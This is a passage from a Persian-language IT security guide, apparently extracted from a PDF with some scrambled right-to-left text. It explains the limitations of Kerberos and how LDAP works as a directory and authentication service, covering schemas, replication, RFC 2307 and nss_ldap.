) Microsoft Active Directoryﻳﻚ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﺯ (LDAPﺑـﺮﺍﻱ ﺫﺧﻴـﺮﺓ ﻛﻠﻴـﺪﻫﺎﻱ Kerberosﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪHeimdal .
Kerberosﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺭﺍ ﭘﺸﺘﻴﺎﺑﻲ ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ MIT Kerberosﻧﻪ؛ ﻭ ﺍﻟﺒﺘﻪ ﺟﺎﻱ ﻧﮕﺮﺍﻧﻲ ﻧﻴﺴﺖ ،ﭼﺮﺍﻛﻪ ﺩﺭ MIT Kerberosﺍﻳﻦ
ﻛﻠﻴﺪﻫﺎ ﺩﺭ ﺧﻮﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ Kerberosﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ.
ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ Kerberos
ﺍﮔﺮﭼﻪ Kerberosﻳﻚ ﺭﺍﻩ ﺣﻞ ﻋﺎﻟﻲ ﺑﺮﺍﻱ ﻳﻚ ﻣﺸﻜﻞ ﺍﺳﺎﺳﻲ ﺍﺳﺖ ﺍﻣﺎ ﻫﻨﻮﺯ ﻫﻢ ﻧﻘﺎﻳﺺ ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ ﮐـﻪ ﺩﺭ ﺫﻳـﻼ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺷـﺎﺭﻩ
ﻣﻲﺷﻮﺩ:
ﻫﺮ ﺳﺮﻭﻳﺲ ﺷﺒﻜﻪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺍﺧﺘﺼﺎﺻﻲ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ Kerberosﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﺩ
ﺑﻌﻠﺖ ﻃﺮﺍﺣﻲ ،Kerberosﻫﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺍﺯ Kerberosﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﺑﺎﻳﺪ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﺩ .ﺭﻭﻧﺪ ﺍﻋﻤﺎﻝ ﺍﻳﻦ ﺗﻐﻴﻴـﺮﺍﺕ ﺭﻭﻱ
ﻻ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻳﺪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ ،ﻭ ﻳﺎ ﺑﺮﻧﺎﻣـﻪﻻ " "Kerberizingﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ .ﻣﻌﻤﻮ ﹰ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻌﻤﻮ ﹰ
ﺍﺯ ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻛﻪ ﺍﺯ ﻗﺒﻞ ﺑﺎ Kerberosﺍﺩﻏﺎﻡ ﺷﺪﻩ )ﻣﺜﻞ PAMﻛﻪ ﺩﺭ ﺍﻧﺘﻬﺎﻱ ﺍﻳﻦ ﻓﺼﻞ ﺩﺭ ﻣﻮﺭﺩ ﺁﻥ ﺑﺤﺚ ﺧﻮﺍﻫﺪ ﺷﺪ(.
ﺑﺨﺶ ﭘﻨﺠﻢ
۱۷۹ﺟﻴﺴﻦ ﻫﻴﺲ ) (Jason Heissﺭﺍﻫﻨﻤﺎﻱ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺩﺭ ﺻﻔﺤﻪﺍﻱ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺧـﻮﺩ ﺑﻨـﺎﻡ "ﺟـﺎﻳﮕﺰﻳﻨﻲ NISﺑـﺎ Kerberosﻭ "LADPﺩﺭ ﺁﺩﺭﺱ
http://www.ofb.net/~jheiss/krbldapﺍﺭﺍﺋﻪ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٤٢
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻨﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺑﺎﻳﺪ ﻫﻤﻴﺸﻪ ﺗﺤﺖ ﻗﻔﻞ ﻭ ﻛﻠﻴﺪ ﻭ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻛﻪ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜﻲ ﺍﻣﻦ ﺍﺳﺖ ﻧﮕﻬـﺪﺍﺭﻱ
ﺷﻮﺩ .ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺧﺮﺍﺏ ﺷﻮﺩ ،ﺗﻤﺎﻡ ﺷﺒﻜﺔ Kerberosﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﮔﺮﺩﺩ.
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﻫﻤﺔ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺎ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺍﺻﻠﻲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ -ﻛﻪ ﺭﻭﻱ ﻫﻤـﺎﻥ ﺩﻳـﺴﻚ
ﺳﺨﺘﻲ ﻭﺍﻗﻊ ﺷﺪﻩ ﻛﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﺷﺪﻩ ﺩﺭ ﺁﻥ ﻫﺴﺘﻨﺪ -ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
Kerberosﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ،ﻫﻤﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺗﻐﻴﻴﺮ ﻳﺎﺑﻨﺪ.
Kerberosﻳﻚ ﺳﻴﺴﺘﻢ ﻛﺎﺭﻱ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺍﺳﺖ ﻭ ﺍﺯ ﺁﻥ ﺑﻪ ﻭﻓﻮﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ ،ﻭ ﺍﺯ ﺁﻥ ﻣﻬﻤﺘـﺮ ﺍﻳﻨﻜـﻪ ﻣﺒـﺎﻧﻲ ﭘﺎﻳـﺔ ﺁﻥ
ﺑﺼﻮﺭﺕ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﺭ ﺩﺳﺘﺮﺱ ﻣﺴﺘﻘﻴﻢ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻧﻴﺰ ﻣﻮﺟﻮﺩ ﻣﻲﺑﺎﺷﻨﺪ.
LDAP
ﭘﺮﻭﺗﻜﻞ ﺳﺒﻚﻭﺯﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ" ) ،(LDAPﻳﻚ ﻧﺴﺨﺔ ﻛﻢ ﺩﺭﺩﺳﺮ ﺍﺯ ﺳﺮﻭﻳﺲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﻳﺮﻛﺘـﻮﺭﻱ X.500ﺍﺳـﺖ ﻛـﻪ
ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ )ﻣﺜﻞ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ،ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ( ﺑﺎ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻛﺎﻧـﺎﻝ ﺍﻣـﻦ
ﺷﺒﻜﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﺩﻭ ﻧﺴﺨﺔ ﺍﺻﻠﻲ ﺍﺯ LDAPﻭﺟﻮﺩ ﺩﺍﺭﺩ LDAPv2 .ﻛﻪ ﺳﺎﻝ ۱۹۹۵ﺩﺭ RFCﺷﻤﺎﺭﺓ ۱۷۷۷ﺗﻮﺻﻴﻒ ﺷﺪﻩ ،ﻣﮑﺎﻧﻴﺰﻡ
ﺍﻣﻨﻴﺘﻲ ﺧﺎﺻﻲ ﺑﺮﺍﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻮﺟﻮﺩ ﻧﻤﻲﺁﻭﺭﺩ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺁﻥ ﺩﺭ ﺗﻌﺎﻣـﻞ ﺑـﺎ Kerberosﺑﺎﺷـﺪ LDAPv3 .ﻛـﻪ ﺩﺭ
RFCﺷﻤﺎﺭﺓ ۲۲۵۱ﺗﻮﺻﻴﻒ ﺷﺪﻩ ﺍﺯ ١٨٠SASLﻫﻢ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﺪ SASL .ﭼﻨﺪ ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛـﺮﺩﻥ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﺭﻣﺰ ﻋﺒﻮﺭ )ﺍﺯ ﺟﻤﻠﻪ (!Kerberosﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ،ﻫﻢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﺘﻦﺑﺎﺯ ﻭ ﭘﺮ ﺍﺳﺘﻔﺎﺩﺓ (OpenLDAP 2.x) LDAPv3ﻭ ﻫـﻢ
ﭘﺮﺍﺳﺘﻔﺎﺩﻩﺗﺮﻳﻦ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺗﺠﺎﺭﻱ ) Active Directoryﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ،ﺩﺭ ﻧﺴﺨﻪﻫﺎﻳﻲ ﻛﻪ ﺑﺎ Windows 2000ﺁﻏﺎﺯ ﺷﺪ( ،ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ SSL/TLS
ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﻛﻞ ﺧﻂ ﺍﺭﺗﺒﺎﻃﻲ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ -ﺍﺯ ﺟﻤﻠﻪ ﺭﻭﺍﻟﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ -ﺭﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ.
LDAPﺑﻪ ﺧﻮﺩﻱ ﺧﻮﺩ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺮﻭﻳﺴﻬﺎﻱ ﻋﻤﻮﻣﻲ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺯ LDAPﺑـﺮﺍﻱ
ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﺷﻤﺎﺭﺓ ﺗﻠﻔﻦ ،ﺁﺩﺭﺱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ،ﻭ ﻓﻬﺮﺳﺖ ﺁﺩﺭﺱ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺩﺭ ﺍﻳـﻦ ﻓـﺼﻞ ﺩﺭ ﻣـﻮﺭﺩ
LADPﺳﺨﻦ ﻣﻲﮔﻮﻳﻴﻢ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﭘﺎﻳﺔ ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺷﻜﻞ ﺩﻫـﺪ ،ﻭ ﻧﻴـﺰ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﻛـﻪ ﺑﻄـﻮﺭ
ﻓﺰﺍﻳﻨﺪﻩﺍﻱ -ﺑﺨﺼﻮﺹ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ Windwosﻭ - Linuxﺑﺮﺍﻱ ﺑﺮﺁﻭﺭﺩﻩ ﻛﺮﺩﻥ ﺍﻳﻦ ﺍﻫﺪﺍﻑ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ.
ﭘﺮﻭﺗﻜﻞ LDAP
ﺍﻃﻼﻋﺎﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ LDAPﺑﻪ ﺷﻜﻞ ﻳﻚ ﺩﺭﺧﺖ ﺍﺯ ﺍﻗﻼﻡ ﺩﺍﺩﻩ -ﻛﻪ ﻫﺮﻳﻚ ﻣﺘﻌﻠﻖ ﺑﻪ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﻃﺒﻘﺔ ﺍﺷـﻴﺎ ﻭ ﺷـﺎﻣﻞ ﺻـﻔﺎﺗﻲ
ﺑﺮﺍﻱ ﻣﻘﺎﺩﻳﺮ ﺧﻮﺩ ﻫﺴﺘﻨﺪ -ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﺷﺪﻩ ﺍﺳﺖ .ﻫﺮ ﻗﻠﻢ ﺩﺍﺩﻩ ﺷﺎﻣﻞ ﻳﻚ ﺻﻔﺖ ﺑﻪ ﻧﺎﻡ ") "cnﻧﺎﻡ ﻣـﺸﺘﺮﻙ( ١٨١ﺍﺳﺖ ﻛـﻪ ﺁﻧـﺮﺍ ﺍﺯ ﺳـﺎﻳﺮ
ﺍﻗﻼﻡ ﺑﺎ ﭘﺪﺭ ﻣﺸﺎﺑﻪ ﺩﺭ ﻫﻤﺎﻥ ﺩﺭﺧﺖ ﻣﺘﻤﺎﻳﺰ ﻣﻲﺳﺎﺯﺩ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ،ﻳﻚ ﻗﻠﻢ ﺩﺍﺩﻩ ﻣﺘﻌﻠﻖ ﺑﻪ ﻃﺒﻘﻪ ﺷﻲﺀ " "posixAccountﺷﺎﻣﻞ ﺻﻔﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﻧﺎﻡ ﻛﺎﻣﻞ ﻛﺎﺭﺑﺮ ) ،(cnﻧـﺎﻡ ﻛـﺎﺭﺑﺮ ﺑـﺮﺍﻱ
ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ) ،(uidﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮ ﻭ ﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺔ ﮔﺮﻭﻩ ) uidNumberﻭ ،(gidNumberﺩﺍﻳﺮﻛﺘـﻮﺭﻱ ﺧﺎﻧـﻪ )،(homeDirectory
ﭘﻮﺳﺘﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ) (loginShellﻭ ﺳﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺑﺮ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ.
ﺩﺭ ﺍﺻﻄﻼﺣﺎﺕ ،LDAPﻳﻚ ﺷﻤﺎ ١٨٢ﺑﻪ ﻣﻌﻨﺎﻱ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﮔﻮﻧﻪﻫﺎﻱ ﺍﺷﻴﺎ ١٨٣ﺍﺳﺖ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻣﻨﻄﻘـﻲ ﻭ ﺗﻌـﺎﺭﻳﻒ ﺻـﻔﺎﺕ ﺑـﻪ ﻫـﻢ
ﻣﺮﺑﻮﻁ ﻫﺴﺘﻨﺪ .ﮔﻮﻧﺔ ﺷﻲﺀ posixAccountﺩﺭ ﺷﻤﺎﻱ ﺳﺮﻭﻳﺲ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪ ) (nis.schemaﺗﻌﺮﻳﻒ ﻣﻲﺷﻮﺩ.
LDAPﻳﻚ ﭘﺮﻭﺗﻜﻞ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ -ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﻩ ﺍﺳﺖ .ﺳﺮﻭﻳﺲﮔﻴﺮﻧـﺪﺓ LDAPﺗﻘﺎﺿـﺎﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ LDAP
ﻣﻲﻓﺮﺳﺘﺪ ﻭ ﭘﺎﺳﺨﻬﺎﻱ ﺁﻧﺮﺍ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﺪ .ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻘﺎﺿﺎﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮ ،ﺍﻧﺠﺎﻡ ﺟﺴﺘﺠﻮ ،ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﻳـﻚ
ﻳﺎ ﺑﻴﺸﺘﺮ ﺻﻔﺎﺕ ﻳﻚ ﻗﻠﻢ ﺩﺍﺩﺓ ﺧﺎﺹ ،ﻭ ﻳﺎ ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﻳﻚ ﺯﻳﺮ ﺩﺭﺧﺖ ﻛﺎﻣﻞ ﺍﺯ ﺍﻗﻼﻡ ﺩﺍﺩﺓ ﻣﻮﺟﻮﺩ ﺩﺭ ﺣﺎﻓﻈﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻔﺮﺳﺘﻨﺪ.
ﺗﻜﺜﻴﺮ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ LDAPﻣﻲﺗﻮﺍﻧﺪ ﺗﻤﺎﻡ ﻣﺨﺎﺯﻥ ﺩﺍﺩﺓ LDAPﺭﺍ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﺗﻜﺜﻴﺮ ﻛﻨﺪ ﺗـﺎ ﺩﺭﺻـﻮﺭﺕ ﺧـﺮﺍﺏ ﺷـﺪﻥ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ،ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ LDAPﺍﺯ ﺩﺳﺖ ﻧﺮﻭﺩ.
LDAPﻳﻚ ﺟﺎﻳﮕﺰﻳﻦ ﻗﺪﺭﺗﻤﻨﺪ ﻭ ﺍﻧﻌﻄﺎﻑﭘﺬﻳﺮ ﺑﺮﺍﻱ NISﻭ NIS+ﺍﺳﺖ .ﺩﺭ ﻛﻨﺎﺭ ﺍﻃﻼﻋـﺎﺕ ﺩﺍﺩﻩﻫـﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ،ﺍﺯ ﻣﺰﺍﻳـﺎﻱ
ﺍﺻﻠﻲ LDAPﺗﻮﺍﻧﺎﻳﻲ ﺫﺧﻴﺮﻩ ﻛﺮﺩﻥ ﻭ ﺍﺭﺍﺋﻪ ﺳﺮﻭﻳﺲ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻭﺟﻮﺩ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻤـﻦﺷـﺪﻩ
ﺑﻮﺳﻴﻠﺔ TLSﺍﺳﺖ .ﺍﺷﻜﺎﻝ ﺍﺻـﻠﻲ LDAPﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﺓ ﺁﻥ ﺑـﺴﻴﺎﺭ ﭘﻴﭽﻴـﺪﻩﺗـﺮ ﺍﺯ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻳـﻚ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ NISﺍﺳﺖ ،ﺍﻣﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺳﺎﺩﻩﺳﺎﺯﻱ ﺭﺍﻫﺒﺮﻱ LDAPﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ.
182 Schema
183 Object Classes
184 End-to-End Encryption
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٤٤
RFCﺷﻤﺎﺭﺓ ۲۳۰۷ﺷﻴﻮﻩﺍﻱ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ LDAPﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪ ﺗﻮﺻﻴﻒ ﻣﻲﻛﻨﺪ .ﺍﮔﺮﭼﻪ ﺍﻳـﻦ RFCﻳـﻚ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﺍ ﻣﺸﺨﺺ ﻧﻤﻲﻛﻨﺪ ،ﺍﻣﺎ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺁﻥ ﺑﻄﻮﺭ ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ،ﻭ ﻳﻚ ﻃﺮﺡ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ
) (nis.schemaﺩﺭ OpenDAP 2.xﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﺍﺳـﺖ .ﻃـﺮﺡ ﻳـﺎﺩ ﺷـﺪﻩ "ﮔﻮﻧـﻪﻫـﺎﻱ ﺍﺷـﻴﺎ" ﺭﺍ ﺗﻌﺮﻳـﻒ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ
) posixAccountﻭ ،(shadowAccountﮔﺮﻭﻫﻬﺎ ) ،(posixGroupﺧﺪﻣﺎﺕ ) ،(ipServiceﭘﺮﻭﺗﻜﻠﻬﺎ ) ،(ipProtocolﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺗﻮﺍﺑـﻊ ﺍﺯ ﺭﺍﻩ
ﺩﻭﺭ ) ،(oncRPSﻣﻴﺰﺑﺎﻧﻬﺎ ) ،(ipHostﺷﺒﻜﻪﻫﺎ ) ،(ipNetworksﮔﺮﻭﻩﻫـﺎﻱ ﺷـﺒﻜﻪﺍﻱ (nisObject ،nisMap ،nisNetgroup) NISﻭ ﺳـﺎﻳﺮ
ﻣﻮﺍﺭﺩ ﺭﺍ ﻧﻤﺎﻳﻨﺪﮔﻲ ﻣﻲﻛﻨﺪ.
ﻫﺮ ﺳﺮﻭﻳﺴﻲ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ ﺑﺎﻳـﺪ ﺑـﺮﺍﻱ ﺗﻌﺎﻣـﻞ ﺑـﺎ LDAPﻣﺠـﺪﺩﹰﺍ ﻧﻮﺷـﺘﻪ ﺷـﻮﺩ؛ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﺸﺎﺑﻪ ﺭﻭﻧـﺪ
" "kerberizingﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ Kerberosﻻﺯﻡ ﺑﻮﺩ .ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻳﻲ ﻧﻈﻴـﺮ Microsoft Windowsﻛـﻪ
ﻫﻤﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺘﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻭﺍﺳﻂ ﺑﺮﻧﺎﻣﻪﺍﻱ ١٨٥ﻣﻨﺘﺸﺮﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻓﺮﻭﺷﻨﺪﻩ ﻣﻲﻛﻨﺪ ﺳـﺎﺩﻩ ﺍﺳـﺖ -ﺍﻣـﺎ ﻫﻨـﻮﺯ ﻫـﻢ
ﺑﺎﺯﻧﻮﻳﺴﻲ ﻗﺴﻤﺖ ﺑﺴﻴﺎﺭ ﻛﻮﭼﻜﻲ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻻﺯﻡ ﺍﺳﺖ.
ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ Unixﭼﻨﺪﺍﻥ ﻛﺎﺭﺁ ﻧﻴﺴﺖ .ﺩﺭﻋﻮﺽ ﺩﻭ ﺭﻭﺵ ﺟﺎﻳﮕﺰﻳﻦ ﺑﻮﺟﻮﺩ ﺁﻣـﺪﻩ ﻛـﻪ ﺑﻌﻨـﻮﺍﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ
ﻣﺘﻦﺑﺎﺯ ﺑﻮﺳﻴﻠﺔ ﺷﺮﻛﺖ PADL Softwareﻣﻨﺘﺸﺮ ﺷﺪﻩ ﻭ ﺩﺭ ﺑﻴﺸﺘﺮ ﺗﻮﺯﻳﻌﻬﺎﻱ Linuxﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳـﺖ .ﺭﻭﺵ ﺍﻭﻝ nss_ldap
ﺍﺳﺖ ﻛﻪ ﺗﻮﺍﺑﻊ ﻛﺘﺎﺑﺨﺎﻧﻪﺍﻱ ) Cﻣﺜﻞ )( (getpwentcﺭﺍ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺑﺮ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﺪ ﺗﺎ ﺑﺼﻮﺭﺕ ﻧﺎﻣﺮﺋﻲ ﺍﺯ ﻳﻚ ﭘﺎﻳﮕﺎﻩ
